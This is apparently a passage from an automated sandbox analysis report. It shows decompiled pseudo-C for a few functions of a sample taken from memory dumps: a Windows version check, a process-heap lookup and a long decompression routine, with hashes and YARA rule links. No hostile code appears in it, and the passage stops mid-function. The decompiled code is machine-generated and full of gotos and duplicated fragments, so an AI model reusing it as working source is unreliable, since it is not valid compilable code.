                                            • Opcode ID: 7542ff24a508abfa09c5746b9f5e87690a1456ceabf9f4aac13d8e4cd5d62461
                                            • Instruction ID: 3016ab1b3ebbe0deccfecb43372676e71e69cabbd6e880806761f99dc1af4a62
                                            • Opcode Fuzzy Hash: 7542ff24a508abfa09c5746b9f5e87690a1456ceabf9f4aac13d8e4cd5d62461
                                            • Instruction Fuzzy Hash: 49F1E3B2A083418FC758CF29D880A1AFBE5BFC8208F19892EF598D7711D734E9458F56
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3A995, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C3A995() {
				struct _OSVERSIONINFOW _v280;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;

				_t12 =  *0xc6d020; // 0x2
				if(_t12 != 0xffffffff) {
					_t6 =  *0xc700f0; // 0xa
					_t13 =  *0xc700f4; // 0x0
				} else {
					_v280.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v280);
					_t12 = _v280.dwPlatformId;
					_t6 = _v280.dwMajorVersion;
					_t13 = _v280.dwMinorVersion;
					 *0xc6d020 = _t12;
					 *0xc700f0 = _t6;
					 *0xc700f4 = _t13;
				}
				if(_t12 != 2) {
					return 0x501;
				} else {
					return (_t6 << 8) + _t13;
				}
			}







                                            0x00c3a998
                                            0x00c3a9a7
                                            0x00c3a9e5
                                            0x00c3a9ea
                                            0x00c3a9a9
                                            0x00c3a9af
                                            0x00c3a9ba
                                            0x00c3a9c0
                                            0x00c3a9c6
                                            0x00c3a9cc
                                            0x00c3a9d2
                                            0x00c3a9d8
                                            0x00c3a9dd
                                            0x00c3a9dd
                                            0x00c3a9f3
                                            0x00000000
                                            0x00c3a9f5
                                            0x00000000
                                            0x00c3a9f8

                                            APIs
                                            • GetVersionExW.KERNEL32(?), ref: 00C3A9BA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Version
                                            • String ID:
                                            • API String ID: 1889659487-0
                                            • Opcode ID: 2460fcc20ff0a0b192300b1a8b48f00853b7c58cd625b4e1619709cfb2f0ad70
                                            • Instruction ID: 11bd76f425a529ddbb8764573ea19ae815dfd05213160939438c7e9f785ae4b3
                                            • Opcode Fuzzy Hash: 2460fcc20ff0a0b192300b1a8b48f00853b7c58cd625b4e1619709cfb2f0ad70
                                            • Instruction Fuzzy Hash: 6CF01DB0D04208CBCB28CB19EE45BED73A5F758310F204295DE5993350E3B0AD909F91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C5ACA1, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C5ACA1() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xc90874 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                            0x00c5aca1
                                            0x00c5aca9
                                            0x00c5acb1

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: HeapProcess
                                            • String ID:
                                            • API String ID: 54951025-0
                                            • Opcode ID: 3f23ead33a5fd1d366d3aee4b93f949ebe50e696031e92d93cf1ee7dd18d75a4
                                            • Instruction ID: 35dbf4950b89dc2ad5e1292472aef824366ab6f2dc9fa2adf932bcbf65c7c794
                                            • Opcode Fuzzy Hash: 3f23ead33a5fd1d366d3aee4b93f949ebe50e696031e92d93cf1ee7dd18d75a4
                                            • Instruction Fuzzy Hash: B0A00270B06601CF97508F36AF0D30D3AE9BE46ED2719916AE609C61B4EB74C860AB45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4589E, Relevance: .8, Instructions: 800COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E00C4589E(intOrPtr __esi) {
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				void* _t328;
				intOrPtr _t333;
				signed int _t347;
				char _t356;
				unsigned int _t359;
				void* _t366;
				intOrPtr _t371;
				signed int _t381;
				char _t390;
				unsigned int _t391;
				void* _t399;
				intOrPtr _t400;
				signed int _t403;
				char _t412;
				signed int _t414;
				intOrPtr _t415;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed short _t424;
				signed int _t425;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t433;
				signed int _t434;
				signed short _t435;
				unsigned int _t439;
				unsigned int _t444;
				signed int _t458;
				signed int _t460;
				signed int _t461;
				signed int _t464;
				signed int _t466;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				intOrPtr* _t474;
				signed int _t478;
				signed int _t479;
				intOrPtr _t483;
				unsigned int _t486;
				void* _t488;
				signed int _t491;
				signed int* _t493;
				unsigned int _t496;
				void* _t498;
				signed int _t501;
				signed int _t503;
				signed int _t511;
				void* _t514;
				signed int _t517;
				signed int _t519;
				signed int _t522;
				void* _t525;
				signed int _t528;
				signed int _t529;
				intOrPtr* _t531;
				void* _t532;
				signed int _t535;
				signed int _t537;
				signed int _t539;
				unsigned int _t546;
				void* _t548;
				signed int _t551;
				unsigned int _t555;
				void* _t557;
				signed int _t560;
				intOrPtr* _t562;
				void* _t563;
				signed int _t566;
				void* _t569;
				signed int _t572;
				intOrPtr* _t575;
				void* _t576;
				signed int _t579;
				void* _t582;
				signed int _t585;
				signed int _t586;
				intOrPtr* _t591;
				void* _t592;
				signed int _t595;
				signed int* _t598;
				unsigned int _t600;
				signed int _t603;
				unsigned int _t605;
				signed int _t608;
				void* _t611;
				signed int _t613;
				signed int _t614;
				void* _t615;
				unsigned int _t617;
				unsigned int _t621;
				signed int _t624;
				signed int _t625;
				signed int _t626;
				signed int _t627;
				signed int _t628;
				signed int _t629;
				unsigned int _t632;
				signed int _t634;
				intOrPtr* _t637;
				intOrPtr _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				char* _t646;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				char* _t652;
				intOrPtr* _t656;
				signed int _t657;
				void* _t658;
				void* _t661;

				L0:
				while(1) {
					L0:
					_t638 = __esi;
					_t598 = __esi + 0x7c;
					while(1) {
						L1:
						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
							goto L12;
						} else {
							_t637 = _t638 + 0x8c;
						}
						while(1) {
							L3:
							_t661 =  *_t643 -  *((intOrPtr*)(_t638 + 0x94)) - 1 +  *_t637;
							if(_t661 <= 0 && (_t661 != 0 ||  *(_t638 + 8) <  *((intOrPtr*)(_t638 + 0x90)))) {
								break;
							}
							L6:
							if( *((char*)(_t638 + 0x9c)) != 0) {
								L99:
								_t415 = E00C447DA(_t638);
								L100:
								return _t415;
							}
							L7:
							_push(_t637);
							_push(_t643);
							_t415 = E00C433D3(_t638);
							if(_t415 == 0) {
								goto L100;
							}
							L8:
							_push(_t638 + 0xa0);
							_push(_t637);
							_push(_t643);
							_t415 = E00C4397F(_t638);
							if(_t415 != 0) {
								continue;
							} else {
								goto L100;
							}
						}
						L10:
						_t458 = E00C44422(_t638);
						__eflags = _t458;
						if(_t458 == 0) {
							goto L99;
						} else {
							_t598 = _t638 + 0x7c;
						}
						L12:
						_t483 =  *((intOrPtr*)(_t638 + 0x4b3c));
						__eflags = (_t483 -  *_t598 &  *(_t638 + 0xe6dc)) - 0x1004;
						if((_t483 -  *_t598 &  *(_t638 + 0xe6dc)) >= 0x1004) {
							L18:
							_t314 = E00C3A4ED(_t643);
							_t315 =  *(_t638 + 0x124);
							_t600 = _t314 & 0x0000fffe;
							__eflags = _t600 -  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4));
							if(_t600 >=  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4))) {
								L20:
								_t627 = 0xf;
								_t316 = _t315 + 1;
								__eflags = _t316 - _t627;
								if(_t316 >= _t627) {
									L26:
									_t486 =  *(_t643 + 4) + _t627;
									 *(_t643 + 4) = _t486 & 0x00000007;
									_t318 = _t486 >> 3;
									 *_t643 =  *_t643 + _t318;
									_t488 = 0x10;
									_t491 =  *((intOrPtr*)(_t638 + 0xe4 + _t627 * 4)) + (_t600 -  *((intOrPtr*)(_t638 + 0xa0 + _t627 * 4)) >> _t488 - _t627);
									__eflags = _t491 -  *((intOrPtr*)(_t638 + 0xa0));
									asm("sbb eax, eax");
									_t319 = _t318 & _t491;
									__eflags = _t319;
									_t460 =  *(_t638 + 0xd28 + _t319 * 2) & 0x0000ffff;
									goto L27;
								} else {
									_t591 = _t638 + (_t316 + 0x29) * 4;
									while(1) {
										L22:
										__eflags = _t600 -  *_t591;
										if(_t600 <  *_t591) {
											_t627 = _t316;
											goto L26;
										}
										L23:
										_t316 = _t316 + 1;
										_t591 = _t591 + 4;
										__eflags = _t316 - 0xf;
										if(_t316 < 0xf) {
											continue;
										} else {
											goto L26;
										}
									}
									goto L26;
								}
							} else {
								_t592 = 0x10;
								_t626 = _t600 >> _t592 - _t315;
								_t595 = ( *(_t626 + _t638 + 0x128) & 0x000000ff) +  *(_t643 + 4);
								 *_t643 =  *_t643 + (_t595 >> 3);
								 *(_t643 + 4) = _t595 & 0x00000007;
								_t460 =  *(_t638 + 0x528 + _t626 * 2) & 0x0000ffff;
								L27:
								__eflags = _t460 - 0x100;
								if(_t460 >= 0x100) {
									L31:
									__eflags = _t460 - 0x106;
									if(_t460 < 0x106) {
										L96:
										__eflags = _t460 - 0x100;
										if(_t460 != 0x100) {
											L102:
											__eflags = _t460 - 0x101;
											if(_t460 != 0x101) {
												L129:
												_t461 = _t460 + 0xfffffefe;
												__eflags = _t461;
												_t493 = _t638 + (_t461 + 0x18) * 4;
												_t603 =  *_t493;
												 *(_t658 + 0x30) = _t603;
												if(_t461 == 0) {
													L131:
													 *(_t638 + 0x60) = _t603;
													_t320 = E00C3A4ED(_t643);
													_t321 =  *(_t638 + 0x2de8);
													_t605 = _t320 & 0x0000fffe;
													__eflags = _t605 -  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4));
													if(_t605 >=  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4))) {
														L133:
														_t628 = 0xf;
														_t322 = _t321 + 1;
														__eflags = _t322 - _t628;
														if(_t322 >= _t628) {
															L139:
															_t496 =  *(_t643 + 4) + _t628;
															 *(_t643 + 4) = _t496 & 0x00000007;
															_t324 = _t496 >> 3;
															 *_t643 =  *_t643 + _t324;
															_t498 = 0x10;
															_t501 =  *((intOrPtr*)(_t638 + 0x2da8 + _t628 * 4)) + (_t605 -  *((intOrPtr*)(_t638 + 0x2d64 + _t628 * 4)) >> _t498 - _t628);
															__eflags = _t501 -  *((intOrPtr*)(_t638 + 0x2d64));
															asm("sbb eax, eax");
															_t325 = _t324 & _t501;
															__eflags = _t325;
															_t326 =  *(_t638 + 0x39ec + _t325 * 2) & 0x0000ffff;
															L140:
															_t629 = _t326 & 0x0000ffff;
															__eflags = _t629 - 8;
															if(_t629 >= 8) {
																_t464 = (_t629 >> 2) - 1;
																_t629 = (_t629 & 0x00000003 | 0x00000004) << _t464;
																__eflags = _t629;
															} else {
																_t464 = 0;
															}
															_t632 = _t629 + 2;
															__eflags = _t464;
															if(_t464 != 0) {
																_t391 = E00C3A4ED(_t643);
																_t525 = 0x10;
																_t632 = _t632 + (_t391 >> _t525 - _t464);
																_t528 =  *(_t643 + 4) + _t464;
																 *_t643 =  *_t643 + (_t528 >> 3);
																_t529 = _t528 & 0x00000007;
																__eflags = _t529;
																 *(_t643 + 4) = _t529;
															}
															__eflags =  *((char*)(_t638 + 0x4c44));
															_t608 =  *(_t658 + 0x30);
															 *(_t638 + 0x74) = _t632;
															if( *((char*)(_t638 + 0x4c44)) == 0) {
																L147:
																_t503 =  *(_t638 + 0x7c);
																_t466 = _t503 - _t608;
																_t328 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																__eflags = _t466 - _t328;
																if(_t466 >= _t328) {
																	L158:
																	__eflags = _t632;
																	if(_t632 == 0) {
																		while(1) {
																			L0:
																			_t638 = __esi;
																			_t598 = __esi + 0x7c;
																			goto L1;
																		}
																	}
																	L159:
																	_t644 =  *(_t638 + 0xe6dc);
																	do {
																		L160:
																		_t645 = _t644 & _t466;
																		_t466 = _t466 + 1;
																		 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t645));
																		_t598 = _t638 + 0x7c;
																		_t644 =  *(_t638 + 0xe6dc);
																		 *_t598 =  *_t598 + 0x00000001 & _t644;
																		_t632 = _t632 - 1;
																		__eflags = _t632;
																	} while (_t632 != 0);
																	goto L161;
																}
																L148:
																__eflags = _t503 - _t328;
																if(_t503 >= _t328) {
																	goto L158;
																}
																L149:
																_t333 =  *((intOrPtr*)(_t638 + 0x4b40));
																_t468 = _t466 + _t333;
																_t646 = _t333 + _t503;
																 *(_t638 + 0x7c) = _t503 + _t632;
																__eflags = _t608 - _t632;
																if(_t608 >= _t632) {
																	L154:
																	__eflags = _t632 - 8;
																	if(_t632 < 8) {
																		goto L117;
																	}
																	L155:
																	_t347 = _t632 >> 3;
																	__eflags = _t347;
																	 *(_t658 + 0x30) = _t347;
																	_t639 = _t347;
																	do {
																		L156:
																		E00C4EA80(_t646, _t468, 8);
																		_t658 = _t658 + 0xc;
																		_t468 = _t468 + 8;
																		_t646 = _t646 + 8;
																		_t632 = _t632 - 8;
																		_t639 = _t639 - 1;
																		__eflags = _t639;
																	} while (_t639 != 0);
																	goto L116;
																}
																L150:
																_t611 = 8;
																__eflags = _t632 - _t611;
																if(_t632 < _t611) {
																	goto L117;
																}
																L151:
																_t511 = _t632 >> 3;
																__eflags = _t511;
																do {
																	L152:
																	_t632 = _t632 - _t611;
																	 *_t646 =  *_t468;
																	 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																	 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																	 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																	 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																	 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																	 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																	_t356 =  *((intOrPtr*)(_t468 + 7));
																	_t468 = _t468 + _t611;
																	 *((char*)(_t646 + 7)) = _t356;
																	_t646 = _t646 + _t611;
																	_t511 = _t511 - 1;
																	__eflags = _t511;
																} while (_t511 != 0);
																goto L117;
															} else {
																L146:
																_push( *(_t638 + 0xe6dc));
																_push(_t638 + 0x7c);
																_push(_t608);
																L71:
																_push(_t632);
																E00C420EE();
																goto L0;
																do {
																	while(1) {
																		L0:
																		_t638 = __esi;
																		_t598 = __esi + 0x7c;
																		do {
																			while(1) {
																				L1:
																				 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																				if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																					goto L12;
																				} else {
																					_t637 = _t638 + 0x8c;
																				}
																				goto L3;
																			}
																			goto L103;
																		} while (_t632 == 0);
																		__eflags =  *((char*)(_t638 + 0x4c44));
																		if( *((char*)(_t638 + 0x4c44)) == 0) {
																			L106:
																			_t537 =  *(_t638 + 0x7c);
																			_t614 =  *(_t638 + 0x60);
																			_t399 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																			_t468 = _t537 - _t614;
																			__eflags = _t468 - _t399;
																			if(_t468 >= _t399) {
																				L125:
																				__eflags = _t632;
																				if(_t632 == 0) {
																					while(1) {
																						L0:
																						_t638 = __esi;
																						_t598 = __esi + 0x7c;
																						L1:
																						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																							goto L12;
																						} else {
																							_t637 = _t638 + 0x8c;
																						}
																					}
																				}
																				L126:
																				_t648 =  *(_t638 + 0xe6dc);
																				do {
																					L127:
																					_t649 = _t648 & _t468;
																					_t468 = _t468 + 1;
																					 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t649));
																					_t598 = _t638 + 0x7c;
																					_t648 =  *(_t638 + 0xe6dc);
																					 *_t598 =  *_t598 + 0x00000001 & _t648;
																					_t632 = _t632 - 1;
																					__eflags = _t632;
																				} while (_t632 != 0);
																				L161:
																				_t643 = _t638 + 4;
																				goto L1;
																			}
																			L107:
																			__eflags = _t537 - _t399;
																			if(_t537 >= _t399) {
																				goto L125;
																			}
																			L108:
																			_t400 =  *((intOrPtr*)(_t638 + 0x4b40));
																			_t468 = _t468 + _t400;
																			_t646 = _t400 + _t537;
																			 *(_t638 + 0x7c) = _t537 + _t632;
																			__eflags = _t614 - _t632;
																			if(_t614 >= _t632) {
																				L113:
																				__eflags = _t632 - 8;
																				if(_t632 < 8) {
																					L117:
																					_t598 = _t638 + 0x7c;
																					__eflags = _t632;
																					if(_t632 == 0) {
																						goto L161;
																					}
																					L118:
																					_t598 = _t638 + 0x7c;
																					 *_t646 =  *_t468;
																					__eflags = _t632 - 1;
																					if(_t632 <= 1) {
																						goto L161;
																					}
																					L119:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																					__eflags = _t632 - 2;
																					if(_t632 <= 2) {
																						goto L161;
																					}
																					L120:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																					__eflags = _t632 - 3;
																					if(_t632 <= 3) {
																						goto L161;
																					}
																					L121:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																					__eflags = _t632 - 4;
																					if(_t632 <= 4) {
																						goto L161;
																					}
																					L122:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																					__eflags = _t632 - 5;
																					if(_t632 <= 5) {
																						goto L161;
																					}
																					L123:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																					__eflags = _t632 - 6;
																					if(_t632 <= 6) {
																						goto L161;
																					}
																					L124:
																					 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																					while(1) {
																						L0:
																						_t638 = __esi;
																						_t598 = __esi + 0x7c;
																						goto L1;
																					}
																				}
																				L114:
																				_t403 = _t632 >> 3;
																				__eflags = _t403;
																				 *(_t658 + 0x30) = _t403;
																				_t641 = _t403;
																				do {
																					L115:
																					E00C4EA80(_t646, _t468, 8);
																					_t658 = _t658 + 0xc;
																					_t468 = _t468 + 8;
																					_t646 = _t646 + 8;
																					_t632 = _t632 - 8;
																					_t641 = _t641 - 1;
																					__eflags = _t641;
																				} while (_t641 != 0);
																				L116:
																				_t638 =  *((intOrPtr*)(_t658 + 0x10));
																				goto L117;
																			}
																			L109:
																			_t615 = 8;
																			__eflags = _t632 - _t615;
																			if(_t632 < _t615) {
																				goto L117;
																			}
																			L110:
																			_t539 = _t632 >> 3;
																			__eflags = _t539;
																			do {
																				L111:
																				_t632 = _t632 - _t615;
																				 *_t646 =  *_t468;
																				 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																				 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																				 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																				 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																				 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																				 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																				_t412 =  *((intOrPtr*)(_t468 + 7));
																				_t468 = _t468 + _t615;
																				 *((char*)(_t646 + 7)) = _t412;
																				_t646 = _t646 + _t615;
																				_t539 = _t539 - 1;
																				__eflags = _t539;
																			} while (_t539 != 0);
																			goto L117;
																		}
																		L105:
																		_push( *(_t638 + 0xe6dc));
																		_push(_t638 + 0x7c);
																		_push( *(_t638 + 0x60));
																		goto L71;
																	}
																	L98:
																	_t417 = E00C41A0E(_t638, _t658 + 0x1c);
																	__eflags = _t417;
																} while (_t417 != 0);
																goto L99;
															}
														}
														L134:
														_t531 = _t638 + (_t322 + 0xb5a) * 4;
														while(1) {
															L135:
															__eflags = _t605 -  *_t531;
															if(_t605 <  *_t531) {
																break;
															}
															L136:
															_t322 = _t322 + 1;
															_t531 = _t531 + 4;
															__eflags = _t322 - 0xf;
															if(_t322 < 0xf) {
																continue;
															}
															L137:
															goto L139;
														}
														L138:
														_t628 = _t322;
														goto L139;
													}
													L132:
													_t532 = 0x10;
													_t613 = _t605 >> _t532 - _t321;
													_t535 = ( *(_t613 + _t638 + 0x2dec) & 0x000000ff) +  *(_t643 + 4);
													 *_t643 =  *_t643 + (_t535 >> 3);
													 *(_t643 + 4) = _t535 & 0x00000007;
													_t326 =  *(_t638 + 0x31ec + _t613 * 2) & 0x0000ffff;
													goto L140;
												} else {
													goto L130;
												}
												do {
													L130:
													 *_t493 =  *(_t493 - 4);
													_t493 = _t493 - 4;
													_t461 = _t461 - 1;
													__eflags = _t461;
												} while (_t461 != 0);
												goto L131;
											}
											L103:
											_t632 =  *(_t638 + 0x74);
											_t598 = _t638 + 0x7c;
											__eflags = _t632;
										}
										L97:
										_push(_t658 + 0x1c);
										_t414 = E00C43564(_t638, _t643);
										__eflags = _t414;
										if(_t414 == 0) {
											goto L99;
										}
										goto L98;
									}
									L32:
									_t634 = _t460 - 0x106;
									__eflags = _t634 - 8;
									if(_t634 >= 8) {
										_t478 = (_t634 >> 2) - 1;
										_t634 = (_t634 & 0x00000003 | 0x00000004) << _t478;
										__eflags = _t634;
									} else {
										_t478 = 0;
									}
									_t632 = _t634 + 2;
									__eflags = _t478;
									if(_t478 != 0) {
										_t444 = E00C3A4ED(_t643);
										_t582 = 0x10;
										_t632 = _t632 + (_t444 >> _t582 - _t478);
										_t585 =  *(_t643 + 4) + _t478;
										 *_t643 =  *_t643 + (_t585 >> 3);
										_t586 = _t585 & 0x00000007;
										__eflags = _t586;
										 *(_t643 + 4) = _t586;
									}
									_t418 = E00C3A4ED(_t643);
									_t419 =  *(_t638 + 0x1010);
									_t617 = _t418 & 0x0000fffe;
									__eflags = _t617 -  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4));
									if(_t617 >=  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4))) {
										L39:
										_t479 = 0xf;
										_t420 = _t419 + 1;
										__eflags = _t420 - _t479;
										if(_t420 >= _t479) {
											L45:
											_t546 =  *(_t643 + 4) + _t479;
											 *(_t643 + 4) = _t546 & 0x00000007;
											_t422 = _t546 >> 3;
											 *_t643 =  *_t643 + _t422;
											_t548 = 0x10;
											_t551 =  *((intOrPtr*)(_t638 + 0xfd0 + _t479 * 4)) + (_t617 -  *((intOrPtr*)(_t638 + 0xf8c + _t479 * 4)) >> _t548 - _t479);
											__eflags = _t551 -  *((intOrPtr*)(_t638 + 0xf8c));
											asm("sbb eax, eax");
											_t423 = _t422 & _t551;
											__eflags = _t423;
											_t424 =  *(_t638 + 0x1c14 + _t423 * 2) & 0x0000ffff;
											goto L46;
										}
										L40:
										_t575 = _t638 + (_t420 + 0x3e4) * 4;
										while(1) {
											L41:
											__eflags = _t617 -  *_t575;
											if(_t617 <  *_t575) {
												break;
											}
											L42:
											_t420 = _t420 + 1;
											_t575 = _t575 + 4;
											__eflags = _t420 - 0xf;
											if(_t420 < 0xf) {
												continue;
											}
											L43:
											goto L45;
										}
										L44:
										_t479 = _t420;
										goto L45;
									} else {
										L38:
										_t576 = 0x10;
										_t625 = _t617 >> _t576 - _t419;
										_t579 = ( *(_t625 + _t638 + 0x1014) & 0x000000ff) +  *(_t643 + 4);
										 *_t643 =  *_t643 + (_t579 >> 3);
										 *(_t643 + 4) = _t579 & 0x00000007;
										_t424 =  *(_t638 + 0x1414 + _t625 * 2) & 0x0000ffff;
										L46:
										_t425 = _t424 & 0x0000ffff;
										__eflags = _t425 - 4;
										if(_t425 >= 4) {
											_t643 = (_t425 >> 1) - 1;
											_t425 = (_t425 & 0x00000001 | 0x00000002) << _t643;
											__eflags = _t425;
										} else {
											_t643 = 0;
										}
										_t428 = _t425 + 1;
										 *(_t658 + 0x14) = _t428;
										_t471 = _t428;
										 *(_t658 + 0x30) = _t471;
										__eflags = _t643;
										if(_t643 == 0) {
											L64:
											_t643 = _t638 + 4;
											goto L65;
										} else {
											L50:
											__eflags = _t643 - 4;
											if(__eflags < 0) {
												L72:
												_t359 = E00C47D76(_t638 + 4);
												_t514 = 0x20;
												_t471 = (_t359 >> _t514 - _t643) +  *(_t658 + 0x14);
												_t517 =  *(_t638 + 8) + _t643;
												 *(_t658 + 0x30) = _t471;
												_t643 = _t638 + 4;
												 *_t643 =  *_t643 + (_t517 >> 3);
												 *(_t643 + 4) = _t517 & 0x00000007;
												L65:
												__eflags = _t471 - 0x100;
												if(_t471 > 0x100) {
													_t632 = _t632 + 1;
													__eflags = _t471 - 0x2000;
													if(_t471 > 0x2000) {
														_t632 = _t632 + 1;
														__eflags = _t471 - 0x40000;
														if(_t471 > 0x40000) {
															_t632 = _t632 + 1;
															__eflags = _t632;
														}
													}
												}
												 *(_t638 + 0x6c) =  *(_t638 + 0x68);
												 *(_t638 + 0x68) =  *(_t638 + 0x64);
												 *(_t638 + 0x64) =  *(_t638 + 0x60);
												 *(_t638 + 0x60) = _t471;
												__eflags =  *((char*)(_t638 + 0x4c44));
												 *(_t638 + 0x74) = _t632;
												if( *((char*)(_t638 + 0x4c44)) == 0) {
													L73:
													_t598 = _t638 + 0x7c;
													_t519 =  *_t598;
													_t366 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
													_t651 = _t519 - _t471;
													__eflags = _t651 - _t366;
													if(_t651 >= _t366) {
														L92:
														__eflags = _t632;
														if(_t632 == 0) {
															goto L161;
														}
														L93:
														_t472 =  *(_t638 + 0xe6dc);
														do {
															L94:
															_t473 = _t472 & _t651;
															_t651 = _t651 + 1;
															 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)(_t473 +  *((intOrPtr*)(_t638 + 0x4b40))));
															_t598 = _t638 + 0x7c;
															_t472 =  *(_t638 + 0xe6dc);
															 *_t598 =  *_t598 + 0x00000001 & _t472;
															_t632 = _t632 - 1;
															__eflags = _t632;
														} while (_t632 != 0);
														goto L161;
													}
													L74:
													__eflags = _t519 - _t366;
													if(_t519 >= _t366) {
														goto L92;
													}
													L75:
													_t371 =  *((intOrPtr*)(_t638 + 0x4b40));
													_t474 = _t371 + _t651;
													_t652 = _t371 + _t519;
													 *_t598 = _t519 + _t632;
													__eflags =  *(_t658 + 0x30) - _t632;
													if( *(_t658 + 0x30) >= _t632) {
														L80:
														__eflags = _t632 - 8;
														if(_t632 < 8) {
															L84:
															__eflags = _t632;
															if(_t632 != 0) {
																 *_t652 =  *_t474;
																__eflags = _t632 - 1;
																if(_t632 > 1) {
																	 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
																	__eflags = _t632 - 2;
																	if(_t632 > 2) {
																		 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
																		__eflags = _t632 - 3;
																		if(_t632 > 3) {
																			 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
																			__eflags = _t632 - 4;
																			if(_t632 > 4) {
																				 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
																				__eflags = _t632 - 5;
																				if(_t632 > 5) {
																					 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
																					__eflags = _t632 - 6;
																					if(_t632 > 6) {
																						 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
																					}
																				}
																			}
																		}
																	}
																}
															}
															goto L161;
														}
														L81:
														_t381 = _t632 >> 3;
														__eflags = _t381;
														 *(_t658 + 0x30) = _t381;
														_t640 = _t381;
														do {
